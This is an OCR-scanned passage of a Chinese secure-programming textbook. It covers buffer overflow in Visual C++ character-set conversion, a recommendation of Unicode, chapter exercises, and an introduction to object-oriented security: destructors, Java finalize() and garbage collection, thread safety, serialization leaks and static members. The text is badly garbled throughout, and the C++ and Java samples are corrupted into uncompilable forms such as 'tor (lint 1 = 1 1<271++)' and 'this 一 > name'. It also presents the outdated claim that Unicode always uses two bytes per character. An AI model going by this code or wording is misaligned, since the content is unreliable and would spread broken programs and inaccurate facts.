LPWSTR lpWideCharStr = (LPWSTR)GlobalAlloc(0, sizeof(WCHAR) * nLen)); 
if( lpWideCharStr == NULL) 
{ 
// 内 存 分 配 失 败 , 作 相 应 处 理 
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// 跳出 
} 
// 正式 转换 
nLen = MultiByteToWideChar(CP_UTF8, MB_ERR_ INVALID CHARS, 
lpMultiByteStr, —1, 
lpWideCharStr, nLen); 
if(nLen == 0) 
{ 
// 函数 调用 异常 , 作 异 常 处 理 
// 跳出 
lL 
// 其 他 收尾 操作 


同样 的 道理 ,WideCharToMultiByte 函数 的 使 用 中 ,也 应 该 特别 注意 缓冲 区 溢出 
的 问题 ,其 解决 方法 和 上 述 内 容 类 似 , 在 此 不 再 袭 述 。 


6.3 ”推荐 使 用 Unicode 


实际 上 ,理想 的 情况 是 ,在 软件 开发 的 过 程 中 ,全 程 使 用 某 一 种 编码 。 并 且 不 在 这 


种 编码 和 别 的 字符 集 之 间 进 行 转换 ,自然 不 会 出 现 字符 集 转换 中 信息 丢失 的 问题 。 


在 要 选择 的 编码 中 ,Unicode(Universal Multiple-Octet Coded Character Set) 是 一 
种 值得 推荐 的 字符 集 。 

随 着 信息 化 交流 的 迅速 发 展 ,个 体 之 间 进行 的 数据 交换 越 来 越 频 繁 , 不 同 的 编码 体 
系 渐渐 成 为 信息 交换 的 障碍 ; 虽然 可 以 进行 编码 转换 ,但 是 由 于 多 种 语言 的 文档 共存 
的 现象 不 断 增多 ,编码 转换 也 成 了 一 件 麻 烦 的 事情 。 因 此 ,设计 一 种 统一 的 编码 显得 非 
常 重要 ,此 种 情况 下 ,Unicode 应 运 而 生 。 

Unicode! 习 又 称 统一 码 、 万 国 码 或 单一 码 , 是 国际 组 织 制定 的 可 以 容纳 世界 上 所 有 
文字 和 符号 的 字符 编码 方案 。Unicode 于 1990 年 开始 研发 ,在 1994 年 正式 公布 。 随 
着 网 络 的 发 展 和 信息 交流 的 增强 ,Unicode 也 在 面世 以 来 的 十 多 年 里 得 到 普及 。 作 为 
一 种 在 计算 机 上 使 用 的 字符 编码 ,针对 每 种 语言 中 的 每 个 字符 ,Unicode 都 设 定 了 统一 


。 并 且 唯一 的 二 进 制 编码 ,这样 ,不 管 在 什么 语言 .什么 平台 下 , Unicode 不 需要 转 码 , 满 


足 了 跨 语言 . 跨 平 台 进行 文本 转换 ,处 理 的 要 求 。 
在 Unicode 公布 之 前 ,对 于 同一 个 字符 ,可 能 出 现 多 种 不 同 的 编码 ,由 于 无 法 知道 


信息 的 来 源 , 任 何 一 台 特 定 的 计算 机 (特别 是 服务 器 ) 都 必须 安装 多 个 字符 集 ,需要 支持 
| 许多 不 同 的 编码 。 但 是 有 了 Unicode, 每 个 字符 的 编码 就 唯一 了 。 


Unicode 是 采用 16 位 编码 体系 ,一 律 使 用 两 个 字 节 表示 一 个 字符 ,特别 值得 强调 
的 是 ,对 于 ASCII 字符 它 也 使 用 两 字 节 表示 。 它 覆盖 了 美国 欧洲、 中 东 、 非 洲 、 印 度 、 


亚洲 和 太平 洋 的 语言 ,以 及 古文 和 专业 符号 。 由 于 支持 Unicode 的 成 员 ,一般 都 是 全 球 


主要 系统 及 软件 制造 商 ,因此 Unicode 很 快 就 成 为 事实 上 的 工业 标准 。 
Unicode 制定 了 3 套 编 码 方式 。 分 别 是 UTF-8、UTF-16 和 UTF-32( 使 用 较 少 )。 
因此 ,如 果 在 开发 软件 的 过 程 中 使 用 Unicode, 并 且 不 将 Unicode 和 其 他 字符 集 进行 转 
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换 , 就 基本 上 不 会 遇 到 转 码 过 程 中 的 安全 问题 。 | 
不 过 ,以 上 情况 只 是 理想 状态 ,实际 操作 的 过 程 中 ,由 于 软件 产品 的 生产 商 繁多 ,本 
软件 使 用 了 Unicode 编码 ,无 法 保证 其 他 软件 (如 数据 库 软 件 ) 使 用 的 也 是 Unicode 编 
码 , 因 此 无 法 保证 自己 不 遇 到 转 码 的 问题 ,但 Unicode 的 推荐 使 用 ,为 软件 国际 化 难度 
的 降低 提供 了 一 个 较 好 的 解决 方案 。 


小 结 


本 章 对 国际 化 (internationalization) 进 行 了 介绍 ,首先 阐述 了 国际 化 和 本 地 化 的 需 
求 和 基本 原理 ,然后 主要 基于 Visual C++ 语言 ,讲解 了 国际 化 转 码 中 需要 注意 的 安全 问 
题 , 最 后 对 Unicode 的 使 用 进行 了 推荐 。 


练习 


1. 一 个 软件 能 够 有 多 种 语言 版 本 ,并 不 是 开发 了 多 个 版 本 。 

(1) 用 JSP 完成 一 个 页 面 ,包含 一 个 登录 表单 (参考 6. 1. 1 节 ) ,要求 能 够 在 英文 、 
简体 中 文 .繁体 中 文 之 间 切 换 。 

(2) 资源 文件 的 命名 有 何 讲究 ? | 

2. 在 用 Visual C++ 进 行 转 码 的 过 程 中 ,会 出 现 缓冲 区 溢出 的 问题 ,请 用 Visual | 
C++ 对 转 码 中 缓冲 区 溢出 的 问题 进行 测试 。 | 

3. 同一 个 字符 在 不 同 的 字符 集中 可 能 有 不 同 的 表达 方式 。 编 写 代码 : 

(1) 查看 “安全 编程 "的 Unicode 表示 方法 ; 

(2) 查看 “安全 编程 "在 GB2312 字符 集中 的 表示 方法 。 

4. 书 中 提 到 ,如 果 使 用 Unicode 就 可 以 避免 转 码 问题 。 

(1) 为 什么 统一 使 用 Unicode 就 没有 转 码 问题 ? 

(2) 实际 上 实现 起 来 有 何 难 度 ? | 

5. 很 多 语言 都 支持 国际 化 资源 文件 。 请 用 . NET 系列 编写 若干 个 不 同 的 资源 文 ， 
件 ,并 且 可 以 用 资源 文件 改变 网 页 上 内 容 , 以 不 同 的 语言 显示 。 


参考 文献 
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2 百度 百科 . unicode. http://baike. baidu. com/view/40801. htm. 
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面向 对 象 中 的 编程 安全 


面向 对 象 (Object Oriented,OO) 是 目前 最 流行 的 软件 开发 方法 之 一 ,也 是 当前 计 
算 机 软件 工程 界 关 心 的 重点 ,从 20 世纪 90 年 代 开 始 , 它 就 慢 慢 变 成 了 软件 开发 方法 的 
主流 。 目 前 ,面向 对 象 的 概念 和 应 用 ,已 经 不 仅仅 集中 于 程序 设计 和 软件 开发 ,而 是 扩 
充 到 计算 机 应 用 的 其 他 应 用 场合 ,如 数据 库 系 统 、 交 互 式 界面 应 用 结构 应 用 平台 、 分 
布 式 系统 、 网 络 管理 结构 .CAD 技术 、 人 工 智 能 等 领域 。 

面向 对 象 强调 人 类 在 日 常 的 思维 逻辑 中 经 常 采 用 的 思维 方法 与 原则 ,其 中 的 重要 
概念 如 抽象 ,分 类 、 继 承 、 聚 合 、 多 态 等 ,都 与 人 们 的 生活 息息相关 ,这 也 成 为 面向 对 象 思 
想 流行 的 原因 。 本 章 主要 介绍 面向 对 象 中 的 安全 编程 ,涉及 面向 对 象 . 内 存 的 分 配 与 释 
放 、 静 态 成 员 安 全 等 几 个 方面 。 


7.1 面向 对 象 概述 


7.1.1 面向 对 象 基本 原理 


面向 对 象 ,可 以 说 是 目前 最 流行 的 软件 开发 方法 之 一 ,目前 大 多 数 的 高 级 语言 都 支 
持 面向 对 象 ,其 实 也 是 用 日 常生 活 中 的 现象 模拟 软件 开发 的 过 程 。 面 向 对 象 包括 两 个 
方面 的 范畴 : 

(1) 面向 对 象 方法 学 ; 

(2) 面向 对 象 程序 开发 技术 。 

其 中 ,面向 对 象 方法 学 是 面向 对 象 程序 开发 技术 的 理论 基础 。 从 面向 对 象 方 法 学 
的 理论 ,可 以 设计 出 类 似 人 类 思维 方式 和 手段 的 面向 对 象 程序 设计 语言 ,从 而 延伸 出 面 
向 对 象 程序 开发 技术 ,使 得 程序 开发 过 程 非常 类 似 于 人 类 的 认 知 。 通 过 面向 对 象 的 方 
法 学 和 面向 对 象 的 程序 开发 技术 开发 出 的 软件 ,具有 模块 化 特色 突出 、 可 读 性 强 、 易 维 
护 性 强 等 优点 。 

在 面向 对 象 的 方法 学 中 ,基于 人 类 对 客观 世界 的 认 知 规律 .思维 方式 和 方法 ,提取 
出 针对 软件 开发 的 如 下 抽象 认识 : 
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客观 世界 由 各 种 各 样 的 实体 组 成 .各 自发 挥 作用 ,相互 进行 通信 ,这 些 实体 称 为 
对 象 ; 
每 个 对 象 都 保存 了 各 自 的 内 部 状态 ,具有 一 定 的 功能 动作 ; 由 于 外 界 其 他 对 象 
或 者 外 部 环境 的 影响 ,对 象 本 身 依据 通信 机 制 , 根 据 具 体 情 况 作出 不 同 的 反应 ; 
多 个 相似 对 象 , 如 果 属 性 和 功能 动作 性 质 类 似 , 可 以 将 其 划分 为 一 类 ; 类 与 类 ， 
之 间 可 以 有 继承 关系 ; 

复杂 的 对 象 可 以 由 相对 简单 的 对 象 通过 一 定 的 方式 组 合 而 成 ; 
对 象 之 间 可 以 通过 各 种 方法 进行 通信 ,等 等 。 | 
总 而 言 之 ,一 系列 简单 或 复杂 的 对 象 进行 组 合 ,其 间 的 相互 作用 和 通信 ,构成 了 各 
种 系统 ,构成 了 人 们 所 面 对 的 客观 世界 。 


7.1.2 面向 对 象 的 基本 概念 


不 管 什么 样 的 语言 ,只 要 支持 面向 对 象 ,实际 上 是 利用 了 面向 对 象 基本 思想 ,其 中 ， 
最 基本 的 概念 有 以 下 几 个 。 

1. 对 象 (Object) | 

对 象 构成 客观 世界 的 一 个 个 实体 ,从 最 简单 的 字符 串 到 复杂 的 软件 系统 等 , 均 可 看 
作对 象 ,广义 上 ,对 象 不 仅 能 表示 具体 的 实体 ,还 能 表示 抽象 的 规则 或 事件 等 。 

对 象 具有 两 个 方面 的 特点 : 

(1) 能 够 保存 一 定 的 状态 ,由 “属性 (attribute) "来 表达 ; 

(2) 能 执行 一 定 的 动作 ,由 “方法 (method) "来 表达 。 

2. 类 (class) ! 

类 是 用 于 描述 同一 类 型 的 对 象 的 一 个 抽象 的 概念 ,类 中 定义 了 这 一 类 对 象 所 应 具 
有 的 属性 和 方法 。 多 个 对 象 的 抽象 成 为 类 ,类 的 具体 化 就 是 对 象 ,通常 的 说 法 ,创建 一 
个 对 象 实际 上 就 是 将 类 实例 化 。 

3. 消息 和 方法 

消息 是 指 对 象 之 间 进行 通信 的 数据 或 者 数据 结构 。 在 通信 的 过 程 中 ,一 个 消息 发 
送 给 某 个 对 象 , 实 际 上 相当 于 调用 另 一 个 对 象 的 方法 ,消息 可 以 是 这 个 方法 的 参数 。 

4. 继承 (Inheritance) 


继承 性 是 指 子 类 自动 共享 父 类 属性 和 方法 的 机 制 。 继 承 的 思想 来 源 于 : 在 定义 和 实 
现 一 个 新 的 类 时 ,可 以 将 一 个 已 经 存在 的 类 作为 父 类 ,新 类 的 定义 在 这 个 父 类 的 基础 之 上 
进行 ,把 这 个 父 类 中 的 属性 和 方法 作为 自己 的 属性 和 方法 ,并 可 加 入 若干 新 的 属性 和 方 
法 。 继 承 性 是 面向 对 象 程序 设计 语言 不 同 于 其 他 语言 的 重要 特点 ,是 其 他 语言 所 没有 的 。 

在 类 的 继承 中 ,如 果子 类 只 继承 一 个 父 类 的 属性 和 方法 , 称 为 单 重 继承 ; 如 果子 类 
继承 了 多 个 父 类 的 属性 和 方法 , 称 为 多 重 继承 。 有 些 语言 (如 C++) 支 持 多 重 继承 ,有 些 | 
语言 (如 Java) 不 支持 多 重 继承 。 | 

在 软件 开发 的 过 程 中 ,类 和 类 之 间 的 继承 ,对 于 信息 的 组 织 与 分 类 ,非常 有 用 , 它 简 
化 了 对 象 .类 的 创建 ,增加 了 代码 的 可 用 重 性 ,使 建立 的 软件 具有 良好 的 可 扩充 性 和 可 
维护 性 。 
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5. 多 态 (Polymorphism) 

多 态 是 指 不 同类 型 对 象 , 收 到 同一 消息 (调用 同一 个 函数 等 ) ,根据 其 类 型 ,可 以 产 
生 不 同 的 结果 。 在 面向 对 象 语言 中 ,一 般 具 有 两 种 形式 的 多 态 : 

(1) 静态 多 态 ,一 般 指 函 数 重 载 ; 

(2) 动态 多 态 ,一 般 利 用 继承 和 邱 数 覆盖 。 

有 了 多 态 性 ,不 同 对 象 可 以 适合 自身 的 方式 ,去 响应 相同 的 消息 ,增强 了 软件 的 可 


扩展 性 和 重用 性 。 


6. 封装 (Encapsulation) 

封装 保证 了 软件 的 每 个 组 成 部 分 具有 优良 的 模块 性 ,通过 定义 外 部 接口 使 模块 之 
间 的 耦合 性 达到 最 小 。 

在 面向 对 象 的 语言 中 ,对 象 是 封装 的 最 基本 单位 ,增加 了 程序 结构 的 清晰 性 ,防止 
了 程序 相互 依赖 性 而 带 来 的 变动 影响 。 


7.2 对 象 内 存 分 配 与 释放 


7.2.1 对 象 分 配 内 存 


对 象 分 配 内 存 , 一 般 叫 做 对 象 的 实例 化 。 在 分 配 内 存 之 前 ,必须 已 经 编写 了 一 个 
类 。 假 设 有 以 下 类 : 


class Customer 

{ 
private String account; 
private String password; 
private String cname; 


如 Java 语言 中 ,声明 一 个 对 象 的 语法 是 : 


Customer cus; 


但 是 ,对 象 是 引用 数据 类 型 ,定义 一 个 对 象 引 用 ,相当 于 声明 一 个 对 象 , 声 明 不 同 于 


， 创建 ,声明 对 象 ,只 分 配 了 存储 地 址 的 存储 器 位 置 ,还 没有 为 其 分 配 内 存 。 只 是 在 内 存 


中 定义 了 一 个 名 字 叫 做 cus 的 引用 ,类似 于 C++ 中 的 指针 ,此 时 指向 空 (nulD 值 ,或 者 说 
引用 为 空 。 


提示 ”在 C++ 中 ,上 面 代 码 相当 于 定义 了 一 个 对 象 ,并 为 其 分 配 内 存 。 而 与 上 面 


。 代码 类 似 的 C++ 版 本 是 : 


Customer * cus; 
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一 般 情 况 下 ,调用 new 方法 才能 创建 一 个 对 象 。 如 果 声 明 的 对 象 引 用 不 指向 任何 
对 象 , 这 样 的 引用 为 “ 空 引用 (Cnull reference 或 null pointer)”; 如 果 声 明 的 对 象 引用 存 
储 了 一 个 实际 对 象 的 地 址 , 则 称 * 引 用 指向 一 个 对 象 ”。 

给 对 象 分 配 内 存 也 称 为 实例 化 对 象 ,在 Java 中 可 以 用 以 下 方式 来 进行 : 


Customer cus = new Customer(); 


这 样 , 就 为 对 象 分 配 了 内 存 。 在 内 存 里 面 ,其 基本 结构 


如 图 7-1 所 示 。 
cus 里 存储 了 实际 对 象 的 地 址 ,可 以 通过 cus 来 访问 各 cname 

个 成 员 。 : 
因此 ,在 为 对 象 分 配 内 存 时 ,一 定 要 注意 引用 是 否 为 图 7-1 

null。 


7.2.2 ”对象 内 存 释放 


对 象 的 生成 比较 简单 ,涉及 的 安全 考虑 也 不 多 ; 与 此 相对 应 ,对 象 的 内 存 也 有 释放 | 
的 过 程 ,但 是 和 生成 相 比 , 它 与 系统 安全 性 的 关系 更 大 一 些 。 

现在 以 C++ 为 例 ,来 阐述 对 象 在 内 存 中 的 存储 和 释放 情况 。 对 象 通常 存放 在 3 个 
内 存 区 域 : 

(1) 全 局 /静态 数据 区 : 主要 存放 全 局 对 象 和 静态 对 象 ,在 该 内 存 区 的 对 象 或 成 
员 , 直 到 进程 结束 , 才 会 释放 内 存 。 | 

(2) 堆 : 存在 于 堆 中 的 数据 ,分 配 内 存 的 方法 一 般 是 new/malloc, 释 放 内 存 的 方法 
是 delete/free。 对 于 这 种 对 象 ,可 以 进行 创建 和 销毁 并 精确 控制 。 堆 对 象 在 C++ 中 的 
使 用 非常 广泛 ,也 得 到 了 广泛 的 应 用 ,不 过 ,用 这 种 方法 分 配 或 释放 内 存 ,也 有 一 些 
缺点 : 

。 需 要 程序 员 手 工 管理 其 创建 和 释放 ,如 果 忘 记 释 放 的 话 ,可 能 会 造成 内 存 泄 句 ; 

。 在 时 间 效 率 和 空间 效率 上 , 堆 对 象 没有 栈 对 象 高 ; 

。 在 程序 中 ,如 果 频繁 使 用 new 来 创建 堆 对 象 或 者 用 delete 来 释放 堆 对 象 ,会 造 ， 

成 大 量 的 内 存 碎片 ,内 存 得 不 到 充分 的 使 用 。 | 

(3) 栈 : 栈 中 一 般 保存 的 是 局 部 对 象 或 者 局 部 变量 ,使 用 栈 对 象 效率 较 高 ,程序 员 
无 须 对 其 生存 周期 进行 管理 。 

C++ 中 ,和 对 象 释放 内 存 相关 的 ,一 般 是 析 构 函数 。 析 构 函数 的 作用 是 释放 对 象 申 
请 的 资源 。 如 下 代码 : 


Customer. cpp 


# include "iostream. h" 
class Customer 
{ 


private: 


Char* name; 


public: 
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// 构造 函数 
Customer(char * name) 
{ 
this 一 > name = name; 
cout << name <<" 构 造 函 数 被 调用 "<< endl; 
} 
// 其 他 代码 
// 析 构 函数 
~ Customer( ) 
{ 
cout << name <<" 析 构 函 数 被 调用 "<< endl; 
} 
}; 
int main(){ 
Customer * cusl = new Customer("cus1"); 
delete(cusl1); 
Customer cus2("cus2"); 


生成 exe 文件 ,运行 ,效果 如 图 7-2 所 示 。 


图 7-2 


提示 。 析 构 函 数 的 调用 中 ,cusl 是 一 个 指针 ,必须 经 过 delete 才能 让 其 调用 ; 而 
另 一 种 情况 下 ,对 象 生命 周期 结束 时 即 可 调用 。 


因此 , 析 构 函数 通常 由 系统 自动 调用 ,在 以 下 几 种 情况 下 系统 会 调用 析 构 函数 。 

。 全 局 对 象 在 进程 结束 时 ; 

。 堆 中 对 象 进行 delete/free 操作 时 ; 

。 栈 中 对 象 生命 周期 结束 时 : 包括 离开 作用 域 . 函 数 正常 跳出 或 者 抛 出 异常 等 。 

在 使 用 析 构 函数 时 ,可 以 充分 利用 它 的 性 质 进行 一 些 操作 ,特别 对 于 栈 中 对 象 ,由 
于 析 构 函数 调用 是 由 系统 自动 完成 的 ,所 以 可 以 利用 这 一 特性 ,将 一 些 需要 随 着 对 象 销 
毁 而 必须 释放 的 资源 封装 在 析 构 函数 里 由 系统 自动 完成 销毁 或 释放 ,这 些 工作 的 典型 
案例 如 : 

。 某 些 资源 的 释放 ; 

。 多 线程 解锁 ; 

。 关闭 文件 ,等 等 。 

这 样 ,利用 栈 对 象 的 这 一 特性 进行 自动 管理 ,可 以 避免 由 于 编程 时 的 遗漏 而 忘记 进 
行 某 种 操作 。 

在 Java 语言 中 ,对 象 的 释放 相对 简单 一 些 。 许 多 方面 ,Java 类 似 于 C++。 但 是 ， 
Java 去 除了 析 构 函数 ,取而代之 的 是 finalize() 方 法 。 

finalize() 与 Ct+ 析 构 函 数 有 什么 区 别 呢 ? 
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实际 上 ,finalize() 是 Java 为 所 有 类 定义 的 一 个 特殊 的 方法 , 它 提供 了 类 似 于 C++ 析 
构 函 数 的 一 些 功能 。 但 是 ,finalize() 与 C++ 的 析 构 函数 并 不 完全 一 样 ,finalize() 方 法 
的 调用 并 不 是 在 对 象 的 作用 域 结束 之 后 马上 进行 .而 是 与 Java 的 垃圾 回收 器 紧密 
相关 。 


六 提示。Java 语言 中 ,创建 一 个 对 象 时 ,Java 虚拟 机 (JVM) 为 该 对 象 分 配 内 存 、 调 
用 构造 函数 并 可 使 用 该 对 象 。 当 程序 发 现 对 于 某 个 对 象 没有 有 效 的 引用 时 ,JVM 通过 
垃圾 回收 器 将 该 对 象 标 记 为 释放 状态 。 垃 圾 回收 器 要 将 一 个 对 象 的 内 存 进行 释放 时 ， 
才 自 动 调用 该 对 象 的 finalize() 方 法 。 

当 Java 虚拟 机 已 确定 尚未 终止 的 任何 线程 无 法 再 通过 任何 方法 访问 此 对 象 时 ,由 
对 象 的 垃圾 回收 器 调用 此 方法 。 对 于 任何 给 定 对 象 , Java 虚拟 机 最 多 只 调用 一 次 
finalize() 方法 。 

finalize() 定 义 于 java. lang. Object 中 ,finalize() 方 法 可 以 被 任何 类 重 写 ,并 完成 类 
似 析 构 函数 的 功能 ,以 配置 系统 资源 或 执行 其 他 清除 。 不 过 ,事实 上 ,可 以 调用 
System. gc() 方法 强制 垃圾 回收 器 来 释放 这 些 对 象 的 内 存 。 

如 下 代码 ; 


P07_01. java 


package prj07; 


class Customer 
{ 
private String account; 
private String password; 
private String cname; 
protected void finalize( ) throws Throwable 
{ 
System. out. println("finalize( )"); 
} 
} 


public class P07_01 
{ 


public static void main(String[ ] args) 
{ 
Customer cus = new Customer(); 
// 给 cus 置 空 
cus = null; 
// 强制 垃圾 回收 
System. gc(); 
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| 
屏幕 打印 ， 
[tinatze0 
会 内 ”注意 ,因为 垃圾 回收 工作 可 能 具有 一 定 的 延迟 ,而 手工 用 System. ge() 进 行 强制 垃 


，” 圾 回收 又 可 能 被 忘记 ,因为 ,很 多 代码 因为 在 这 个 问题 上 忽略 了 ,造成 了 安全 隐患 ,如 下 
Note 代码 : 


P07_02. java 


package prj07; 
import java. util. ArrayList; 


class MyObject 
{ 
protected void finalize( ) throws Throwable 
| 
System. out. println("finalize( )"); 
} 
} 
public class P07_02 
{ 
public static void main(String[ ] args) 
{ 
ArrayList al = new ArrayList(); 
tor (lint 1 = 1 1<271++) 
{ 
MyObject obj = new MyObject(); 
al.add(obj); 
obj= null; 
} 
System. gc( ); 


} 


运行 该 代码 ,没有 任何 的 反应 。 垃 圾 回收 机 制 也 无 法 调用 MyObject 的 finalize() 
方法 。 虽然 此 时 所 有 的 obj 都 被 置 空 ,但 是 它们 没有 被 释放 ,因为 变量 al 引用 了 这 些 对 
象 。 所 以 ,在 使 用 这 类 功能 时 要 特别 小 心 。 除 非 将 代码 改 为 : 


P07_03. java 


package prj07; 
import java. util. ArrayList; 


class MyObject 
{ 
protected void finalize( ) throws Throwable 
' 
System. out. println("finalize()"); 
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} 
} 
public class P07_03 
{ 
public static void main(String[ ] args) 
{ 
ArrayList al = new ArrayList(); 
for (int i = 1; i<2;i++) 
{ 
MyObject obj = new MyObject(); 
al.add(obj); 
obj= null; 
} 
al = null; 
System. gc( ); 


} 


运行 ,屏幕 上 打印 : 

lfinalize( ) 

综 上 所 述 ,Java 的 垃圾 回收 机 制 确实 可 以 减 小 程序 员 的 工作 量 , 对 于 Java 回收 机 
制 ,可 以 遵循 以 下 准则 : 

。 在 不 使 用 某 对 象 时 , 显 式 地 将 此 对 象 赋 空 ,等 待 垃圾 回收 ; 如 : 


ClassA ca = new ClassR (); 

// 应 用 ca 对象 

// 当 使 用 对 象 ca, 确认 没有 其 他 使 用 之 后 主动 将 其 设置 为 空 
ca = null; 


。 遵循 谁 创建 谁 释放 的 原则 ,让 程序 更 有 条 理 ; 

。 可 以 在 合适 的 场景 下 使 用 对 象 池 技 术 以 提高 系统 性 能 ; 

。 尽量 避免 强制 系统 做 垃圾 内 存 的 回收 ,增长 系统 做 垃圾 回收 的 最 终 时 间 ; 必要 

时 候 , 可 以 调用 System. gc() 方 法 强制 垃圾 回收 。 | 

不 过 ,根据 Java 语言 规范 定义 ,不 同 的 JVM 实现 者 可 能 使 用 不 同 的 算法 管理 垃圾 
收集 器 ,System. gc() 函 数 不 保 证 JVM 的 垃圾 收集 器 一 定 会 马上 执行 。 但 通常 来 说 ， 
除非 在 一 些 特定 的 场合 ,如 实时 系统 ,用 户 不 希望 垃圾 收集 器 突然 中 断 应 用 程序 执行 而 
进行 垃圾 回收 ,垃圾 收集 器 的 执行 影响 应 用 程序 的 性 能 ,此 时 可 以 调整 垃圾 收集 器 的 参 
数 , 让 垃圾 收集 器 能 够 通过 平缓 的 方式 释放 内 存 。 


7.2.3 ”对象 线程 安全 


在 很 多 情况 下 ,对 象 可 能 在 多 线程 的 环境 下 运行 。 一 个 对 象 在 其 生命 周期 内 可 以 
被 多 个 线程 访问 ,实际 上 是 多 线程 通信 的 一 种 方式 ,此 种 情况 就 会 出 现 多 种 问题 ,其 中 
最 重要 的 就 是 多 线 环境 下 对 象 的 状态 安全 访问 以 及 修改 。 实 际 上 ,很 多 系统 软件 (如 服 
务 器 ) 已 经 在 底层 实现 了 线程 安全 ,因此 ,隐患 主要 来 源 于 : 程序 员 不 知道 该 组 件 对 象 ， 
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使 用 线程 来 实现 ,错误 地 使 用 一 些 非 线程 机 制 情况 下 的 方法 。 

关于 对 象 线程 安全 ,有 两 个 方面 的 问题 : 

(1) 很 多 框架 下 都 提供 了 对 象 被 多 个 线程 访问 的 机 制 , 当 对 象 可 能 被 多 个 线程 来 
运行 时 , 千 万 不 能 在 对 象 中 保存 和 某 个 线程 相关 的 状态 。 

例如 ,JavaEE 中 的 Servlet, 其 运行 模型 为 : 每 一 个 请 求实 际 上 就 是 一 个 线程 ,来 运 
行 Servlet 的 某 些 函数 ,此 时 ,Servlet 中 就 不 宜 保存 相应 的 状态 数据 。 

(2) 当 对 象 可 能 被 多 个 线程 进行 操作 时 ,应 该 考虑 同步 问题 。 该 问题 在 前 面 的 章 
节 有 所 讲解 ,在 此 省 略 。 


7.2.4 ”对象 序列 化 安全 


对 象 序列 化 是 面向 对 象 语言 中 的 重要 特性 之 一 ,在 Java 系列 和 . NET 系列 中 ,都 
可 以 使 用 一 定 的 手段 实现 对 象 序列 化 。 一 般 情 况 下 ,对 象 具有 一 定 的 生命 周期 , 随 着 生 


成 该 对 象 的 程序 作用 域 结束 而 结束 。 但 是 ,有 时 候 , 程 序 可 能 需要 将 对 象 的 状态 保存 下 


来 ,或 者 写 人 文件 ,或 者 写 人 数据 传输 流 ,在 需要 时 再 将 对 象 读 和 人 之 后 进行 恢复 ,这 里 面 
就 需要 序列 化 的 工作 。 

对 象 序列 化 ,就 是 将 对 象 的 状态 转换 成 字 节 流 (当然 也 可 能 是 字 节 流 以 上 的 一 些 包 
装 流 ), 在 使 用 的 时 候 , 可 以 通过 读 取 流 中 的 内 容 , 生 成 相同 状态 的 对 象 。 序 列 化 
(Serialization) 过 程 的 工作 一 般 是 : 对 象 将 描述 自己 状态 的 数据 输出 到 流 中 ,描述 自己 


状态 的 数据 ,一 般 是 成 员 变量 ,因此 ,序列 化 的 主要 任务 是 写 出 对 象 成 员 变 量 的 数值 。 
特殊 情况 下 ,如果 对 象 中 , 某 个 成 员 变 量 是 另 一 对 象 的 引用 , 则 被 引用 的 对 象 也 要 序列 


化 ,因此 ,序列 化 工作 是 递归 的 。 
在 很 多 应 用 中 ,对 象 序列 化 具有 很 重要 的 作用 。 如 数据 传输 软件 中 ,传输 的 数据 一 


。 般 是 一 个 对 象 ,这 种 情况 下 ,该 对 象 应 该 具备 写 人 流 中 的 能 力 ,也 就 是 说 需要 被 序列 化 ; 


另外 一 些 情况 下 ,可 能 需要 将 对 象 写 和 持久 化 存储 (如 数据 库 和 文件 ) ,也 需要 进行 对 象 
的 序列 化 。 

以 Java 为 例 , 将 对 象 序列 化 的 方法 很 简单 ,满足 两 个 条 件 即 可 ， 

。 将 该 对 象 对 应 的 类 实现 Serializable 接口 ; 

。 该 对 象 被 序列 化 成 员 必须 是 非 静态 成 员 变量 ; 

其 他 语言 中 ,序列 化 过 程 类 似 。 不 过 ,对 象 序列 化 只 能 保存 成 员 变量 的 值 , 其 他 内 
容 , 如 成 员 函 数 .修饰 符 等 ,都 不 能 保存 。 

对 象 序列 化 有 什么 安全 问题 呢 ? 

由 于 对 象 序列 化 之 后 要 在 网 上 传输 ,或 者 写 入 数据 流 , 因 此 ,需要 关心 的 问题 一 般 
是 信息 泄密 问题 。 对 象 被 序列 化 时 ,使 用 字 节 数组 表示 ,并 且 加 上 了 很 多 控制 标记 ,在 


一 定 程度 上 阻止 了 对 象 成 员 直 接 被 攻击 者 识别 。 但 是 还 是 不 能 完全 阻止 对 象 内 容 的 泄 


密 , 对 保存 的 对 象 稍 加 分 析 , 则 可 获取 需要 的 信息 。 所 以 ,在 序列 化 时 ,一 定 要 注意 不 能 


。 让 敏感 信息 (如 卡号 密码 ) 汇 密 。 


解决 该 问题 的 方法 有 两 种 : 
(1) 在 将 对 象 实现 序列 化 时 ,进行 一 些 处 理 ,如 加 密 。 该 类 方法 将 在 后 面 的 章节 中 


。 详细 叙述 。 
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(2) 不 要 将 敏感 信息 序列 化 。 

可 以 通过 一 些 手段 ,不 将 某 些 成 员 序列 化 。 如 在 Java 中 ,可 以 在 成 员 前 面 加 上 
transient 关键 字 , 在 序列 化 时 ,系统 将 会 回避 这 些 字段 。 


沁 提 示 “实际 上 ,不 将 某 些 信息 序列 化 ,还 有 其 他 一 些 作 用 ,如 : 

。 网 络 之 间 传 递 信息 时 ,可 以 避免 一 些 占用 大 量 字 节 数 的 对 象 进 行 传输 ,减轻 网 
络 压力 ; 

。 在 对 象 中 可 能 有 一 些 成 员 不 是 简单 的 变量 ,而 是 引用 类 型 ,但 是 这 些 成 员 引 用 
没有 实现 序列 化 接口 ,一 般 情况 下 会 出 现 异 常 ,为 了 避免 这 种 异常 ,可 以 将 这 些 
成 员 设 置 为 “不 序列 化 ”的 。 


7.3 静态 成 员 安全 


7.3.1 静态 成 员 的 机 理 


在 类 中 ,数据 成 员 可 以 分 静态 成 员 、 非 静态 成 员 两 种 。 

类 中 的 成 员 , 通 常情 况 下 ,必须 通过 它 的 类 的 对 象 访问 ,但 是 可 以 创建 这 样 一 个 成 
员 ,使 它 的 使 用 完全 独立 于 该 类 的 任何 对 象 ,被 类 的 所 有 对 象 共用 。 

在 成 员 的 声明 前 面 加 上 关键 字 static( 静 态 ) 就 能 创建 这 样 的 成 员 , 这 种 成 员 叫 做 静 ， 
态 成 员 。 如 果 一 个 成 员 变量 被 声明 为 static, 就 是 静态 变量 ,如 果 一 个 成 员 方 法 被 声明 
为 static ,就 是 静态 方法 ,它们 就 能 够 在 它 的 类 的 任何 对 象 创建 之 前 被 访问 ,而 不 必 引 用 
任何 对 象 。 

静态 成 员 变量 存储 在 全 局 数据 区 ,为 该 类 的 所 有 对 象 共 享 ,不 属于 任何 对 象 的 存储 
空间 ,逻辑 上 所 有 对 象 都 共享 这 一 存储 单元 ,对 静态 成 员 变量 的 任何 操作 影响 这 一 存储 
单元 的 所 有 对 象 。 

如 下 代码 : 


class Customer 
{ 
private String account; 
private String password; 
private String cname; 
public static String bankName; 
} 


调用 : 


Customer cusl = new Customer(); 
